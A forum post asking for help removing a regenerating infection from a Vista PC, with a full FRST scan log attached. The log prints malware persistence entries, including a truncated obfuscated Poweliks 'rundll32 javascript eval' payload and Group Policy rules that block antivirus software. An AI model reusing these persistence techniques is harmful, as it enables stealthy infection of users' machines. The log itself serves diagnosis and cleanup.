Jump to content

Regenerating Bug


Recommended Posts

Good afternoon,

 

I have an infection on a friend's PC running Vista Home Premium 32-bit SP2 that is driving me to drink. I have tried to remove it myself using various tools but any progress I make is undone within minutes by this malware. So far, Combofix has listed a ZeroAccess rootkit that it has removed. MBAM has shown and allegedly removed 2 trojans. The first was a dropper.ed and agent.ed. The second one I don't remember the name of exactly. It was something along the lines of Milsap or some such. Chrome-like browser windows appear on their own with an IP address as the URL (one of which is from Scranton, PA I found out). The IPs cycle through in this order: 206.51.231.110, 66.197.157.20, 184.173.181.55 and operate under a process known as browser.exe. Each Chrome-like window stays up for a few seconds until the "unresponsive page" warning appears and the browser closes. It is followed by another soon after. Chrome itself is not installed on this computer. I followed the browser.exe process to the following directory: LocalLow/UIMobile/ValidatorVisual. Deleting either ValidatorVisual or UIMobile directories only fixes the issue until it regenerates. Upon deleting the UIMobile directory, the first file to return is titled JawaVinyl.pac, has a size of ~44,762KB, and is (given the extension) a proxy auto configuration file. On the various scans that I've run, some have pointed out that the computer is configured to use a proxy of the 127.0.0.1 port 5555. Looking at the connection settings under Internet Options, the computer is not configured to automatically detect nor use a hard-coded proxy.

 

Per the sticky, here are the FRST.txt and Addition.txt logs. I have been working on this at work. So, any references to the proxy address of 192.168.0.101:3128 are legit, as that is my empoyer's CentOS web proxy. Thanks in advance for your help.

 

FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 23-08-2014 16:54:35
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgtray.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [irfuqApivh] => regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat"
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {a906d2bc-6084-11e3-9d8a-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableChangePassword] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableLockWorkstation] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [swg] => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\RunOnce: [spchecker] => C:\Program Files\AVG\AVG10\Notification\SPCheckerTE.exe [390472 2011-12-22] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
URLSearchHook: HKCU - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} -  No File
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-08-23] (Malwarebytes Corporation)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:23 - 2014-08-23 11:25 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk
2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-23 16:20 - 00038790 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-23 16:16 - 00000000 ____D () C:\Qoobox
